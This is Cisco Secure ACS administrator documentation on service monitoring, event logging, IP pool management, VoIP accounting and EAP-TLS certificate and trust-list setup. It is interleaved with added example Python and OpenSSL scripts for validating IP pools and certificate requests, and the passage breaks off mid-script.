  • Generate event when an attempt is made to log in to a disabled account—Specifies whether or not Cisco Secure ACS generates a Windows event when a user attempts to log in to your network using a disabled account.

Setting Up System Monitoring

To set up Cisco Secure ACS System Monitoring, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click ACS Service Management.

Result: The ACS Active Service Management Setup page appears.

Step 3   To have Cisco Secure ACS test the login process, follow these steps:

a. Select the Test login process every X minutes check box.

b. Type the number of minutes that should pass between each login process test in the X box.

c. From the on failure list, select the action Cisco Secure ACS should take when the login test fails.

Step 4   To have Cisco Secure ACS generate a Windows event when a user attempts to log in to your network using a disabled account, select the Generate event when an attempt is made to log in to a disabled account check box.

Step 5   If you want to set up event logging, proceed to the "Setting Up Event Logging" section.

Step 6   If you are done setting up Cisco Secure ACS Service Management, click Submit.

Result: Cisco Secure ACS implements the service management settings you made.





Event Logging

The Event Logging feature enables you to configure whether Cisco Secure ACS logs events to the Windows event log and whether Cisco Secure ACS generates an e-mail when an event occurs. Cisco Secure ACS detects events using the System Monitoring feature. For more information about system monitoring, see the "System Monitoring Options" section.

Setting Up Event Logging

To view the Windows NT/2000 event log, choose Start > Administrative Tools > Event Viewer. For more information about the Windows event log or Event Viewer, refer to your Microsoft Windows documentation.

To set up Cisco Secure ACS event logging, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click ACS Service Management.

Result: The ACS Active Service Management Setup page appears.

Step 3   To have Cisco Secure ACS send all events to the Windows event log, select Log all events to the NT Event log.

Step 4   To have Cisco Secure ACS send an e-mail when an event occurs, follow these steps:

a. Select the Email notification of event check box.

b. In the To box, type the e-mail address to which Cisco Secure ACS should send event notification e-mail.


Note    Do not use underscores in the e-mail addresses you type in this box.

c. In the SMTP Mail Server box, type the hostname of the e-mail server that sends the notifications.


Note    The SMTP mail server must be operational and must be available from the Cisco Secure ACS server.

Step 5   If you want to set up system monitoring, proceed to the "Setting Up System Monitoring" section.

Step 6   If you are done setting up Cisco Secure ACS Service Management, click Submit.

Result: Cisco Secure ACS implements the service management settings you made.





IP Pools Server

The IP Pools Server feature enables you to assign the same IP address to multiple users, provided that the users are on different segments of the network. This means you can re-use IP addresses and reduce the number of IP addresses on your network. When you enable this feature, Cisco Secure ACS dynamically issues IP addresses from the IP pools you have defined by number or name. You can configure up to 999 IP pools, for approximately 255,000 users.

If you are using IP pooling and proxy, all accounting packets are proxied so that the Cisco Secure ACS that is assigning the IP addresses can confirm whether an IP address is already in use.

To use IP pools, the AAA client must have network authorization (aaa authorization network) and accounting (aaa accounting) enabled.


Note   To use the IP Pools feature, you must set up your AAA client to perform authentication and accounting using the same protocol—either TACACS+ or RADIUS.

For information on assigning a group or user to an IP pool, see the "Setting IP Address Assignment Method for a User Group" section or the "Assigning a User to a Client IP Address" section.

Allowing Overlapping IP Pools or Forcing Unique Pool Address Ranges

Cisco Secure ACS provides automated detection of overlapping pools.


Note    To use overlapping pools, you must be using RADIUS with virtual private networking, and you cannot be using Dynamic Host Configuration Protocol (DHCP).

You can determine whether overlapping IP pools are currently allowed by checking which button appears below the AAA Server IP Pools table:

  • Allow Overlapping Pool Address Ranges—Indicates that overlapping IP pool address ranges are currently not allowed. Clicking the button allows IP address ranges to overlap between pools.
  • Force Unique Pool Address Range—Indicates that overlapping IP pool address ranges are currently allowed. Clicking the button prevents IP address ranges from overlapping between pools.

To allow overlapping IP pools or to force unique pool address ranges, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click IP Pools Server.


Note    If this feature does not appear, click Interface Configuration, click Advanced Options, and then select the IP Pools check box.

Result: The AAA Server IP Pools table lists any IP pools you have configured, their address ranges, and the percentage of pooled addresses in use.

Step 3   If you want to allow overlapping IP pool address ranges, follow these steps:

a. If the Allow Overlapping Pool Address Ranges button appears, click that button.

Result: Cisco Secure ACS allows overlapping IP pool address ranges.

b. If the Force Unique Pool Address Range button appears, do nothing.

Cisco Secure ACS already allows overlapping IP pool address ranges.

Step 4   If you want to deny overlapping IP pool address ranges, follow these steps:

a. If the Allow Overlapping Pool Address Ranges button appears, do nothing.

Cisco Secure ACS already does not permit overlapping IP pool address ranges.

b. If the Force Unique Pool Address Range button appears, click that button.

Result: Cisco Secure ACS does not permit overlapping IP pool address ranges.





Refreshing the AAA Server IP Pools Table

You can refresh the AAA Server IP Pools table. This allows you to get the latest usage statistics for your IP pools.

To refresh the AAA Server IP Pools table, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click IP Pools Server.

Result: The AAA Server IP Pools table lists any IP pools you have configured, their address ranges, and the percentage of pooled addresses in use.

Step 3   Click Refresh.

Result: Cisco Secure ACS updates the percentages of pooled addresses in use.





Adding a New IP Pool

You can define up to 999 IP address pools.

To add an IP pool, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click IP Pools Server.

Result: The AAA Server IP Pools table lists any IP pools you have already configured, their address ranges, and the percentage of pooled addresses in use.

Step 3   Click Add Entry.

Result: The New Pool table appears.

Step 4   In the Name box, type the name you want to assign to the new IP pool.

Step 5   In the Start Address box, type the lowest IP address of the range of addresses for the new pool.


Note    All addresses in an IP pool must be on the same Class C network, so the first three octets of the start and end addresses must be the same. For example, if the start address is 192.168.1.1, the end address must be between 192.168.1.2 and 192.168.1.254.

Step 6   In the End Address box, type the highest IP address of the range of addresses for the new pool.

Step 7   Click Submit.

Result: The new IP pool appears in the AAA Server IP Pools table.
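As an added example (not Cisco's code), the following Python checks a pool definition against the same-Class-C rule in the note above and detects overlapping address ranges of the kind the Force Unique Pool Address Range setting rejects. The exclusion of host octets .0 and .255, the duplicate-name check, and the function names are assumptions; the pool data is constructed.

```python
"""Added example, not Cisco's code: validate an ACS IP pool definition
(same first three octets, start below end) and find overlapping pools as
the 'Force Unique Pool Address Range' setting forbids. Pool data below is
constructed; the .0/.255 and duplicate-name checks are assumptions."""
from ipaddress import IPv4Address

MAX_POOLS = 999  # the page states up to 999 pools can be defined


def validate_pool(name, start, end):
    """Return a list of problems; an empty list means the pool is acceptable."""
    problems = []
    if not name:
        problems.append("pool name is empty")
    try:
        s, e = IPv4Address(start), IPv4Address(end)
    except ValueError as exc:
        return problems + [f"bad address: {exc}"]
    # Page rule: all addresses must be on one Class C network
    if s.packed[:3] != e.packed[:3]:
        problems.append("start and end must share the first three octets")
    if s >= e:
        problems.append("end address must be higher than start address")
    # Assumption drawn from the page's 192.168.1.1 .. 192.168.1.254 example:
    # the network (.0) and broadcast (.255) addresses are not pool members
    if any(octet in (0, 255) for octet in (s.packed[3], e.packed[3])):
        problems.append("host octet must be 1..254")
    return problems


def overlapping_pools(pools):
    """pools: list of (name, start, end). Returns (name_a, name_b) pairs
    whose ranges share at least one address."""
    ranges = [(n, int(IPv4Address(s)), int(IPv4Address(e))) for n, s, e in pools]
    ranges.sort(key=lambda r: r[1])  # by start address
    found = []
    for i, (name_a, start_a, end_a) in enumerate(ranges):
        for name_b, start_b, _ in ranges[i + 1:]:
            if start_b > end_a:
                break  # later pools start even higher, so none can overlap a
            found.append((name_a, name_b))
    return found


def can_add_pool(existing, name, start, end, allow_overlap=False):
    """Problems that would stop adding (name, start, end) to the existing
    pools; allow_overlap mirrors 'Allow Overlapping Pool Address Ranges'."""
    problems = validate_pool(name, start, end)
    if len(existing) >= MAX_POOLS:
        problems.append("pool limit of 999 reached")
    if any(n == name for n, _, _ in existing):  # assumed constraint
        problems.append("pool name already in use")
    if not allow_overlap and not problems:
        for a, b in overlapping_pools(existing + [(name, start, end)]):
            if name in (a, b):
                other = b if a == name else a
                problems.append(f"range overlaps pool {other}")
    return problems


if __name__ == "__main__":
    # Constructed pools, not a real configuration
    pools = [("branch-a", "10.0.0.1", "10.0.0.100"),
             ("branch-b", "10.0.0.50", "10.0.0.150"),
             ("branch-c", "10.0.1.1", "10.0.1.50")]
    print("overlaps:", overlapping_pools(pools))
    print("add vpn:", can_add_pool(pools, "vpn", "10.0.1.51", "10.0.1.200"))
```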





Editing an IP Pool Definition

To edit an IP pool definition, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click IP Pools Server.

Result: The AAA Server IP Pools table lists any IP pools you have configured, their address ranges, and the percentage of pooled addresses in use.

Step 3   Click the name of the IP pool you need to edit.

Result: The name pool table appears, where name is the name of the IP pool you selected. The In Use field displays the number of IP addresses of this pool that are currently allocated to a user. The Available field displays the number of IP addresses currently unallocated to users.

Step 4   To change the name of the pool, type the new name for the IP pool in the Name box.

Step 5   To change the starting address of the pool range of IP addresses, in the Start Address box, type the lowest IP address of the new range of addresses for the pool.


Note    All addresses in an IP pool must be on the same Class C network, so the first three octets of the start and end addresses must be the same. For example, if the start address is 192.168.1.1, the end address must be between 192.168.1.2 and 192.168.1.254.

Step 6   To change the ending address of the pool range of IP addresses, in the End Address box, type the highest IP address of the new range of addresses for the pool.

Step 7   Click Submit.

Result: The edited IP pool appears in the AAA Server IP Pools table.





Resetting an IP Pool

The Reset function recovers IP addresses within an IP pool when there are "dangling" connections. A dangling connection results from a user disconnecting without Cisco Secure ACS receiving an accounting stop packet. If the Failed Attempts log in Reports and Activity shows a large number of "Failed to Allocate IP Address For User" messages, consider using the Reset function to reclaim all allocated addresses in this IP pool.


Note   Using the Reset function to reclaim all allocated IP addresses in a pool can result in users being assigned addresses that are already in use.

To reset an IP pool and reclaim all its IP addresses, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click IP Pools Server.

Result: The AAA Server IP Pools table lists any IP pools you have configured, their address ranges, and the percentage of pooled addresses in use.

Step 3   Click the name of the IP pool you need to reset.

Result: The name pool table appears, where name is the name of the IP pool you selected. The In Use field displays the number of IP addresses of this pool that are currently assigned to a user. The Available field displays the number of IP addresses currently not assigned to users.

Step 4   Click Reset.

Result: Cisco Secure ACS displays a dialog box indicating the possibility of assigning users addresses that are already in use.

Step 5   To continue resetting the IP pool, click OK.

Result: The IP pool is reset. All its IP addresses are reclaimed. In the In Use column of the AAA Server IP Pools table, zero percent of the IP pool's addresses are assigned to users.





Deleting an IP Pool


Note   If you delete an IP pool that has users assigned to it, those users cannot authenticate until you edit the user profile and change their IP assignment settings. Alternately, if the users receive their IP assignment based on group membership, you can edit the user group profile and change the IP assignment settings for the group.

To delete an IP pool, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click IP Pools Server.

Result: The AAA Server IP Pools table lists any IP pools you have configured, their address ranges, and the percentage of pooled addresses in use.

Step 3   Click the name of the IP pool you need to delete.

Result: The name pool table appears, where name is the name of the IP pool you selected. The In Use column displays the number of IP addresses of this pool that are currently assigned to a user. The Available column displays the number of IP addresses currently not assigned to users.

Step 4   Click Delete.

Result: Cisco Secure ACS displays a dialog box to confirm that you want to delete the IP pool.

Step 5   To continue with deleting the IP pool, click OK.

Result: The IP pool is deleted. The AAA Server IP Pools table does not list the deleted IP pool.





IP Pools Address Recovery

The IP Pools Address Recovery feature enables you to recover assigned IP addresses that have not been used for a specified period of time. For Cisco Secure ACS to reclaim the IP addresses correctly, network accounting must be configured on the AAA client.

Enabling IP Pool Address Recovery

To enable IP pool address recovery, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click IP Pools Address Recovery.


Note    If this feature does not appear, click Interface Configuration, click Advanced Options, and then select the IP Pools check box.

Result: The IP Address Recovery page appears.

Step 3   Select the Release address if allocated for longer than X hours check box and in the X box type the number of hours after which Cisco Secure ACS should recover assigned, unused IP addresses.

Step 4   Click Submit.

Result: Cisco Secure ACS implements the IP pools address recovery settings you made.





VoIP Accounting Configuration

The VoIP Accounting Configuration feature enables you to specify which accounting logs receive VoIP accounting data. There are three options for VoIP accounting:

  • Send to both RADIUS and VoIP Accounting Log Targets—Cisco Secure ACS appends VoIP accounting data to the RADIUS accounting data and logs it separately to a CSV file. To view the data, you can use either RADIUS Accounting or VoIP Accounting under Reports and Activity.
  • Send only to VoIP Accounting Log Targets—Cisco Secure ACS only logs VoIP accounting data to a CSV file. To view the data, you can use VoIP Accounting under Reports and Activity.
  • Send only to RADIUS Accounting Log Targets—Cisco Secure ACS only appends VoIP accounting data to the RADIUS accounting data. To view the data, you can use RADIUS Accounting under Reports and Activity.

Configuring VoIP Accounting


Note   The VoIP Accounting Configuration feature does not enable VoIP accounting. To enable VoIP accounting, see "Working with Logging and Reports."

To configure VoIP accounting, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click VoIP Accounting Configuration.


Note    If this feature does not appear, click Interface Configuration, click Advanced Options, and then select the Voice-over-IP (VoIP) Accounting Configuration check box.

Result: The VoIP Accounting Configuration page appears. The Voice-over-IP (VoIP) Accounting Configuration table displays the options for VoIP accounting.

Step 3   Select the VoIP accounting option you want.

Step 4   Click Submit.

Result: Cisco Secure ACS implements the VoIP accounting configuration you specified.





Cisco Secure ACS Certificate Setup

Cisco Secure ACS provides an Extensible Authentication Protocol Transport Layer Security (EAP-TLS) feature for user authentication using digital certificates in RADIUS. With EAP-TLS, the same enterprise PKI (public key infrastructure) system and user certificates deployed for secure e-mail, Internet, or desktop security can be used for RADIUS user authentication.

Background on Certification

EAP and TLS are both IETF RFC standards. The EAP protocol extends the network point-to-point protocol (PPP) by providing new methods for carrying authentication information before establishing PPP connections, specifically, EAPOL (the encapsulation of EAP over LANs as established by IEEE 802.1X). In addition to digital certificates, EAP has methods for username and password authentication (that is, EAP-MD5 Challenge). TLS is the next generation SSL security protocol. TLS provides a way to use certificates for both user authentication, and for dynamic ephemeral session key generation. For more detailed information on EAP, TLS, and EAP-TLS, refer to the following IETF RFCs: PPP Extensible Authentication Protocol (EAP) RFC 2284, The TLS Protocol RFC 2246, and PPP EAP TLS Authentication Protocol RFC 2716.

Digital certificates are particularly useful because they require neither shared secrets nor stored database credentials, can be scaled and trusted over large deployments, and can serve as a "two-factor" method of authentication that is stronger and more secure than shared secret systems. Mutual trust requires that Cisco Secure ACS have an installed certificate that can be verified by AAA clients and that a user attempting authentication via EAP-TLS bears a certificate from a trusted certification authority (CA). For authentication of a user to occur, the subject name contained in the user certificate must be identical to the username in the Cisco Secure ACS database (or the external LDAP Directory or Windows 2000 database that Cisco Secure ACS uses). Cisco Secure ACS requires that certificates and CA files used be in Base64-encoded X.509 version 3.

A user who is authenticated using EAP-TLS can then be mapped to user or group authorization information kept in the CiscoSecure user database, or in the Windows 2000 or generic LDAP Directory Server. Your Cisco Secure ACS must be installed on a Windows 2000 server (not Windows NT) if you intend to use EAP-TLS in conjunction with a Windows 2000 user database.

EAP-TLS requires support from both the end client and the AAA client. An example of an EAP-TLS client includes the Windows XP operating system; EAP-TLS compliant AAA clients include Cisco 802.1x-enabled switch platforms (such as the Catalyst 6000 product line), and Cisco Aironet Wireless solutions. In addition, Cisco Secure ACS needs to generate or enroll into an existing PKI and be granted an X.509 v3 digital certificate.

EAP-TLS Setup Overview

This section outlines the basic steps necessary to implement EAP-TLS in Cisco Secure ACS.

  • Obtain, and install on Cisco Secure ACS, a "server" certificate. You can perform the "server" certificate installation using either the manual enrollment procedure or automatic enrollment procedure in this section.
  • Install a certificate for the CA that issued the Cisco Secure ACS "server" certificate. For more information, see the "Certification Authority Setup" section.
  • Ensure that any CA that you want to allow users to employ is listed in the Cisco Secure ACS's certificate trust list (CTL). For more information see the "Editing the Certificate Trust List" section.
  • Verify that users you intend to authenticate using EAP-TLS reside in a database that supports EAP-TLS (CiscoSecure user database, Windows 2000 database, or generic LDAP database only).
  • Verify that the user account names in Cisco Secure ACS match the subject field in each user certificate.
  • Confirm that you have configured authentication options for EAP-TLS and then restart Cisco Secure ACS. For more detailed information see the "Global Authentication Setup" section.

Requirements for Certificate Enrollment

Cisco Secure ACS supports a variety of PKIs for digital certificate enrollment. To use the ACS general certificate enrollment feature, the following conditions apply:

  • You must have a CA capable of handling PKCS #10 certificate requests if you intend to use Cisco Secure ACS to generate the certificate request.
  • You must only employ certificates that meet the X.509 v3 digital certificate standard.
  • The certificate's intended purpose must include server authentication.

This section contains procedures for the following subjects:

Generating a Request for a Certificate

You perform this generation procedure to create an RSA key pair for the server and a new digital certificate for Cisco Secure ACS, and to send information to a CA, requesting that they assign the server certificate for your Cisco Secure ACS. All EAP-TLS authentications require certificates from both the end-user clients and the Cisco Secure ACS(s) configured for EAP-TLS support. To obtain a server certificate, you can either import an existing server certificate into Cisco Secure ACS, or generate a new one. You do not need to perform this procedure from within Cisco Secure ACS if you have alternative means of generating a certificate request (including producing private and public key pairs). Note that one server certificate may be used for more than one Cisco Secure ACS by exporting the certificate and keypair from one server and importing this credential into additional Cisco Secure ACS(s).


Note   If you are using a file to install a certificate in Cisco Secure ACS, the certificate must comply with the X.509 version 3 digital certificate standard.

To request a certificate for manual enrollment, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click ACS Certificate Setup.

Result: If you are accessing this page for the first time, Cisco Secure ACS displays the Install new certificate table on the ACS Certificate Setup page. (If you have already installed a server certificate, information on it is displayed.)

Step 3   Select the Manual certificate enrollment option.

Step 4   To have Cisco Secure ACS generate a certificate signing request (CSR), follow these steps:

a. Select the Generate certificate signing request (CSR) option.

b. In the Certificate subject box, type cn= followed by the name that you would like to use as subject name in this ACS certificate, for example, cn=ACSWireless.

c. In the Private key file box, type the full directory path and name of the file in which the private key is saved, for example, c:\privateKeyFile.pem.


Tip This private key is used later in the certificate installation process.

d. In the Private key password box, type the private key password (that you have invented).

e. In the Retype private key password box, retype the private key password.

f. From the Key length list, select the length of the key to be used.


Tip The choices for Key length are 512 or 1024 bits. The default and more secure choice is 1024 bits.

g. From the Digest to sign with list, select the digest (or hashing algorithm).


Tip The choices for Digest to sign with are MD2, MD5, SHA, and SHA1. The default is SHA1.

Step 5   Click Submit.

Result: Cisco Secure ACS prepares a certificate signing request and displays it in the display area, on the right, under a banner that reads:

Now your certificate signing request is ready. You can copy and paste it into any certification authority enrollment tool.

Step 6   Open a browser window and navigate to the web site of your CA. Then copy the encoded certificate signing request from Cisco Secure ACS and paste it into the CA submission form, as applicable.

Result: The CA receives the request and issues a certificate.


Tip Typically, the CA generates the certificate and provides the means for you to download it.





Installing Cisco Secure ACS Certification with Manual Enrollment

You perform this procedure to install a Cisco Secure ACS certificate.

Before You Begin

You must have a server certificate for your Cisco Secure ACS before you can install it. You can use the procedure in the "Generating a Request for a Certificate" section, or any other means to obtain a certificate for manual installation.

If you are using Microsoft Windows 2000 Certificate Services to obtain your server certificate, you can obtain it with the procedure in the "Installing Cisco Secure ACS Certification with Automatic Enrollment" section, or you can generate the request with the MS Certificate Services web interface. For more information, refer to the "EAP-TLS Deployment Guide," which can be found on the Cisco Secure ACS Product Literature site:

http://www.cisco.com/warp/public/cc/pd/sqsw/sq/prodlit/index.shtml

To install an existing certificate for use on Cisco Secure ACS, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click ACS Certificate Setup.

Result: Cisco Secure ACS displays the Install new certificate table on the ACS Certificate Setup page.

Step 3   Select the Manual certificate enrollment option.

Step 4   Select the Use existing certificate option.

Step 5   Specify whether Cisco Secure ACS should read the certificate from a file or use a certificate that is already in local machine storage. Do one of the following:

a. To specify that Cisco Secure ACS should read the certificate from a specified file, select the Read certificate from file option, and then type the full directory path and name of the certificate file in the Certificate file box.

b. To specify that Cisco Secure ACS should use a particular existing certificate from local machine storage, select the Use certificate from storage option, and then type the certificate CN (common name/subject name) in the Certificate CN box (without the "cn=" prefix).

Step 6   If you generated the request using Cisco Secure ACS, in the Private key file box, type the full directory path and name of the file that contains the private key.


Note    If the certificate was installed in storage with the private key, you do not have the private key file and do not need to type it.


Tip This is the private key associated with the server certificate.

Step 7   In the Private key password box, type the private key password.

Step 8   Click Submit.

Result: To show that the certificate setup is complete, Cisco Secure ACS displays the Installed Certificate Information table, which contains the following certificate information:

  • Issued to: certificate subject
  • Issued by: CA common name
  • Valid from:
  • Valid to:
  • Validity
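The following is an added example, not part of the Cisco Secure ACS documentation and not the code that ACS itself runs. It reproduces with OpenSSL what the "Generating a Request for a Certificate" procedure does (a passphrase-protected private key file and a CSR with the subject cn=ACSWireless), and then applies the checks worth making on the certificate the CA returns before you type its path and the private key file into the "Use existing certificate" fields: that the certificate really belongs to that private key file, that it has not expired, and what the Installed Certificate Information table will show. The file names, the passphrase and the self-signed stand-in for the CA-issued certificate are assumptions made so that the example runs offline.

```sh
#!/bin/sh
# Added example, not from the Cisco Secure ACS documentation and not what ACS
# runs internally: reproduce the CSR that ACS generates, then run the checks
# worth doing on the certificate the CA returns before installing it with
# "Use existing certificate". File names, passphrase and subject are assumptions.
set -eu

# gen_acs_csr DIR CN PASSPHRASE [BITS] [DIGEST]
# Writes DIR/privateKeyFile.pem (passphrase-protected; what ACS calls the
# "Private key file") and DIR/acs.csr (the text you paste into the CA form).
gen_acs_csr() {
  dir=$1; cn=$2; pass=$3; bits=${4:-2048}; digest=${5:-sha256}
  # ACS offers 512 or 1024 bits; 512-bit RSA has been factored in public and
  # must not be used. Outside ACS, 2048 is the sensible minimum today.
  openssl genrsa -aes128 -passout "pass:$pass" -out "$dir/privateKeyFile.pem" "$bits" 2>/dev/null
  # "cn=ACSWireless" in the ACS Certificate subject box is /CN=ACSWireless here.
  # The digest only signs the request; the CA chooses the signature algorithm
  # of the certificate it issues, so a modern digest costs nothing.
  openssl req -new -key "$dir/privateKeyFile.pem" -passin "pass:$pass" \
    -subj "/CN=$cn" "-$digest" -out "$dir/acs.csr"
}

# csr_subject CSR -> the subject as OpenSSL prints it
csr_subject() { openssl req -in "$1" -noout -subject; }

# csr_selfcheck CSR -> exit 0 if the request's own signature verifies; a CSR
# damaged in copy-and-paste is the usual reason a CA enrollment form rejects it
csr_selfcheck() { openssl req -in "$1" -noout -verify >/dev/null 2>&1; }

# key_bits KEYFILE PASSPHRASE -> modulus size, or nothing if the passphrase is wrong
key_bits() {
  openssl rsa -in "$1" -passin "pass:$2" -noout -text 2>/dev/null \
    | sed -n 's/.*Private-Key: (\([0-9]*\) bit.*/\1/p'
}

# cert_matches_key CERT KEYFILE PASSPHRASE -> exit 0 only if the certificate's
# public key belongs to this private key file (the one named in Step 6)
cert_matches_key() {
  cert_mod=$(openssl x509 -in "$1" -noout -modulus)
  key_mod=$(openssl rsa -in "$2" -passin "pass:$3" -noout -modulus 2>/dev/null) || return 1
  [ "$cert_mod" = "$key_mod" ]
}

# cert_summary CERT -> the fields ACS shows as Installed Certificate Information
cert_summary() { openssl x509 -in "$1" -noout -subject -issuer -dates; }

# cert_is_valid_now CERT -> exit 0 unless the certificate has already expired
cert_is_valid_now() { openssl x509 -in "$1" -noout -checkend 0 >/dev/null; }

# Stand-alone demonstration with assumed values. A self-signed certificate made
# from the same key stands in for the one your CA would issue from acs.csr.
workdir=$(mktemp -d)
gen_acs_csr "$workdir" ACSWireless 'example-passphrase'
csr_subject "$workdir/acs.csr"
csr_selfcheck "$workdir/acs.csr" && echo "CSR self-signature OK"
echo "key size: $(key_bits "$workdir/privateKeyFile.pem" 'example-passphrase') bits"
openssl x509 -req -in "$workdir/acs.csr" -signkey "$workdir/privateKeyFile.pem" \
  -passin pass:example-passphrase -days 365 -out "$workdir/acs-cert.pem" 2>/dev/null
cert_matches_key "$workdir/acs-cert.pem" "$workdir/privateKeyFile.pem" 'example-passphrase' \
  && echo "certificate matches privateKeyFile.pem"
cert_is_valid_now "$workdir/acs-cert.pem" && echo "certificate is within its validity period"
cert_summary "$workdir/acs-cert.pem"
cat "$workdir/acs.csr"   # this is what you paste into the CA enrollment form
```

Run it as is to see the CSR it produces. The defaults here (2048 bits, SHA-256) are stronger than the 1024-bit/SHA1 maximum that ACS itself can generate, which is one reason to produce the request outside ACS and install the result manually.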




Installing Cisco Secure ACS Certification with Automatic Enrollment

You can use this process to install an ACS certificate issued by your existing Microsoft enterprise CA.

Before You Begin

To use the Cisco Secure ACS automatic certificate enrollment feature, the following conditions must be met:

  • You must be using Microsoft Windows 2000 Certificate Services
  • Your Cisco Secure ACS must be installed on a Windows 2000 server (not Windows NT)
  • Your Cisco Secure ACS must be part of the same domain as the Microsoft enterprise CA, or it must belong to a domain that has a trust relationship with the domain that the Microsoft Enterprise CA belongs to
  • You must provide Cisco Secure ACS with an administrator login and password for the domain to which Cisco Secure ACS belongs

To use automatic enrollment to install a new ACS certificate, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click ACS Certificate Setup.

Result: Cisco Secure ACS displays the Install new certificate table on the ACS Certificate Setup page.


Note   If your Cisco Secure ACS has already been enrolled with a certificate, you will not see the Install new certificate table. Rather, you would see the Installed Certificate Information table.

Step 3   Select the Automatic certificate enrollment option in the lower portion of the page.

Step 4   To specify the Microsoft CA, under Microsoft Windows 2000 Certificate Services, follow these steps:

a. In the CA server name box, type the name of the CA server.

b. In the CA common name box, type the common name of the CA.

c. In the Certificate subject box, type the name you want to use as subject name for the Cisco Secure ACS certificate.

Step 5   In the Administrative login box, type the login name.

Step 6   In the Password box, type the password.

Step 7   Click Submit.

Result: To show that the certificate setup is complete, Cisco Secure ACS displays the Installed Certificate Information table, which contains the following certificate information:

  • Issued to: certificate subject
  • Issued by: CA common name
  • Valid from:
  • Valid to:
  • Validity




Performing Cisco Secure ACS Certification Update or Replacement

You can use this process to update or replace an existing Cisco Secure ACS certificate that has expired or is otherwise no longer usable.


Warning This procedure removes your existing Cisco Secure ACS certificate. Because EAP-TLS requires a server certificate, EAP-TLS authentication does not work again until the replacement certificate is installed.

To install a new ACS certificate, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click ACS Certificate Setup.

Result: Cisco Secure ACS displays the Installed Certificate Information table on the ACS Certificate Setup page.


Note   If your Cisco Secure ACS has not already been enrolled with a certificate, you do not see the Installed Certificate Information table. Rather, you see the Install new certificate table. If this is the case, you can proceed to Step 5.

Step 3   Click Enroll New Certificate.

Result: A confirmation dialog box appears.

Step 4   To confirm that you intend to enroll a new certificate, click OK.

Result: The existing Cisco Secure ACS certificate is removed.

Step 5   You can now install the replacement certificate in the same manner as an original certificate. For detailed procedural information, see the "Installing Cisco Secure ACS Certification with Manual Enrollment" section or the "Installing Cisco Secure ACS Certification with Automatic Enrollment" section.





Certification Authority Setup

Cisco Secure ACS comes preconfigured with a list of popular CAs, none of which is trusted until you explicitly mark it as trusted. To specify one or more CAs as trusted to issue user certificates, perform the procedure in the "Editing the Certificate Trust List" section.

You perform the procedure in the "Adding a New CA Certificate to Local Certificate Storage" section to add a new CA to your certificate trust list (CTL).

Cisco Secure ACS uses the CTL to verify client certificates: only certificates issued by a CA that is on the Cisco Secure ACS CTL are trusted. If all clients and Cisco Secure ACS obtain their certificates from the same CA, you do not need to add that CA to the CTL, because Cisco Secure ACS automatically trusts the CA that issued its own server certificate. You do still need to install the certificate of the CA that issued the Cisco Secure ACS server certificate in local certificate storage; it does not need to be added to the CTL.

This section contains procedures for the following subjects:

Trust Requirements and Models

TLS authentication relies on two elements of trust. The first is established during the TLS negotiation: by verifying an RSA signature that the client produces with its private key, Cisco Secure ACS confirms that the end user possesses the private key matching the public key in the presented certificate, that is, that the user is the legitimate holder of that certificate and of the user identity it contains. On its own, this proves only that the user holds the key pair; it says nothing about whether the identity in the certificate is genuine. The second element is the signature of a third party, usually a CA, that vouches for the information in the certificate. This third-party binding is the equivalent of the seal on a U.S. passport: you trust the passport because you trust the identity checks that the passport office performed before issuing it. You trust digital certificates in the same way, by installing the root certificate of the CA whose signature you accept.

How you edit your CTL determines your trust model. Many organizations use a restricted trust model, in which only a few privately controlled CAs are trusted. This model provides the highest level of security but limits adaptability and expandability. The alternative, an open trust model, admits more CAs, including public CAs, and trades security for that adaptability and expandability.

We recommend that you fully understand the implications of your trust model before editing the CTL in Cisco Secure ACS.

Editing the Certificate Trust List

You use this procedure to add CAs to or remove CAs from your CTL.

To edit the CTL, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click Certification Authority Setup.

Result: Cisco Secure ACS displays the CA Operations table.

Step 3   To edit the certificate trust list, click Edit certificate trust list.

Result: The system displays the Edit the Certificate Trust List (CTL) table.


Warning Adding a public CA that you do not control may reduce your system security. For more information, see the "Trust Requirements and Models" section.

Step 4   To add a CA to your CTL, select its check box. To remove a CA from the CTL, clear its check box.


Tip You can select, or deselect, as many CAs as you want.

Step 5   Click Submit.

Result: Cisco Secure ACS adds (or removes) the specified CA to (or from) the CTL.





Adding a New CA Certificate to Local Certificate Storage

Use this procedure to add a new certificate to local certificate storage.

You must perform this procedure for the CA that issued your server certificate. Installing a CA certificate in local storage is distinct from adding the CA to the CTL, which marks it as trusted to issue user certificates.


Note   Cisco Secure ACS requires that certificate and CA files be in Base64-encoded X.509 (PEM) format, not binary DER. You can also add the CA certificate by installing it outside of Cisco Secure ACS (in Windows). After you install it, the new CA appears in the CA list within Cisco Secure ACS.

To add a new CA certificate to local certificate storage, follow these steps:


Step 1   In the navigation bar, click System Configuration.

Step 2   Click Certification Authority Setup.

Result: Cisco Secure ACS displays the CA Operations table.

Step 3   In the CA file name box, type the full directory path and name of the CA certificate file.

Step 4   Click Submit.

Result: Cisco Secure ACS displays the following message in the display area on the right:

New CA certificate is successfully added into the global system certificate storage.

After you have installed a certificate in Cisco Secure ACS and added the required CAs, you can configure EAP-TLS in Global Authentication Setup and then restart Cisco Secure ACS.
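The following added example (not from the Cisco documentation) shows the two practical points of this section in OpenSSL: converting a CA certificate that arrives in binary DER form, as Windows CAs commonly export it, into the Base64-encoded form that ACS requires, and checking a user certificate against a trust list in the way the CTL is applied, so that a certificate from a CA you did not select is rejected. The CA names CorpCA and SomePublicCA, the user names, the OpenSSL configuration file and all file names are constructed for the example and are not ACS defaults.

```sh
#!/bin/sh
# Added example, not from the Cisco Secure ACS documentation: convert a CA
# certificate to the Base64-encoded X.509 (PEM) form that ACS requires, and
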